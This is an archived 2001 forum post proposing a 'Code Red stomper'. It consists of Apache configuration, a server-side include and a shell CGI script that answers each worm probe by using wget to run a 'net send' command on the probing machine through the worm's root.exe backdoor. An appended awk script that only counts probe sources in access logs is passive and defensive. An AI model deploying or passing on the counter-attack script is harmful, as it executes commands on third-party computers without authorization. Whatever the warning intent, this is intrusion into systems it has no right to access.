
Code Red - how to help.

Jack Snodgrass

Aug 11, 2001, 2:04:59 PM
Not sure how effective this is or not.

If you have a Linux box running Apache, you can set up the following:

in your httpd.conf file add:
AddHandler server-parsed .ida
AddType text/html .ida

then create a default.ida file in your document root directory that
contains:
<!--#exec cgi="/cgi-bin/codered_stomper" -->

make sure that you have "includes" turned on for the document root
directory.

restart apache.

If you access http://yourbox/default.ida you should get an error
since you haven't created /cgi-bin/codered_stomper yet.

Once all that works, create a /cgi-bin/codered_stomper file that
has:
#!/bin/sh
echo Content-type: text/plain
echo
/usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?/c+net+send+%2A+Machine+%25COMPUTERNAME%25+has+been+infected+by+the+Code+Red+II+worm+and+attacked+my+server"
/usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?/c+net+send+%2A+Please+see+http://www.cert.org/advisories/CA-2001-23.html+and+fix+this+server+ASAP."


You'll need wget installed.

When a Code Red box tries to deliver its payload, you'll connect back to
their web server and use the code red backdoor to send a local system
message. Maybe if someone gets this, they'll fix their stupid box.


I got the idea from someone on the net... I added a few changes to make it
work on my systems.

I don't think that it would be a good idea to start erasing or destroying
files.

A simple 'hey stupid' message will hopefully suffice.

jack
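
A passive way to see which hosts are sending these requests, as an added example that is not part of the original post: the shell function below reads Apache access-log lines and counts default.ida probes per source address, labelling the padding variant (N padding for the original Code Red, X padding for Code Red II). The function names and the sample log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: count Code Red probes per source in an Apache access log.

# Constructed sample lines (documentation addresses; worm requests shortened).
sample_log() {
cat <<'EOF'
192.0.2.10 - - [11/Aug/2001:13:58:01 -0500] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090%u6858 HTTP/1.0" 200 11
198.51.100.7 - - [11/Aug/2001:13:59:40 -0500] "GET /default.ida?NNNNNNNNNNNNNNNN%u9090%u6858 HTTP/1.0" 200 11
192.0.2.10 - - [11/Aug/2001:14:01:12 -0500] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090%u6858 HTTP/1.0" 200 11
203.0.113.5 - - [11/Aug/2001:14:02:30 -0500] "GET /default.ida HTTP/1.1" 200 11
203.0.113.5 - - [11/Aug/2001:14:02:45 -0500] "GET /index.html HTTP/1.1" 200 1532
EOF
}

# Read access-log lines on stdin; print "<source> <variant> <hits>" per line.
codered_sources() {
    awk '
    {
        # The request line is the first double-quoted field; skip odd lines.
        if (split($0, q, "\"") < 3) next
        n = split(q[2], req, " ")
        if (n < 2 || req[1] != "GET") next

        # Only default.ida requests carrying a query string are probes;
        # a bare /default.ida is the admin testing the handler.
        prefix = "/default.ida?"
        if (index(req[2], prefix) != 1) next

        # Classify by the first padding characters after the "?".
        pad = substr(req[2], length(prefix) + 1, 8)
        if (pad ~ /^N+$/)      variant = "CodeRed"
        else if (pad ~ /^X+$/) variant = "CodeRedII"
        else                   variant = "other"
        hits[$1 " " variant]++
    }
    END { for (k in hits) print k, hits[k] }
    ' | LC_ALL=C sort
}

# Run over the constructed sample when executed directly.
sample_log | codered_sources
```

To run it over a real log, feed the file on stdin, for example `codered_sources < access_log`.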

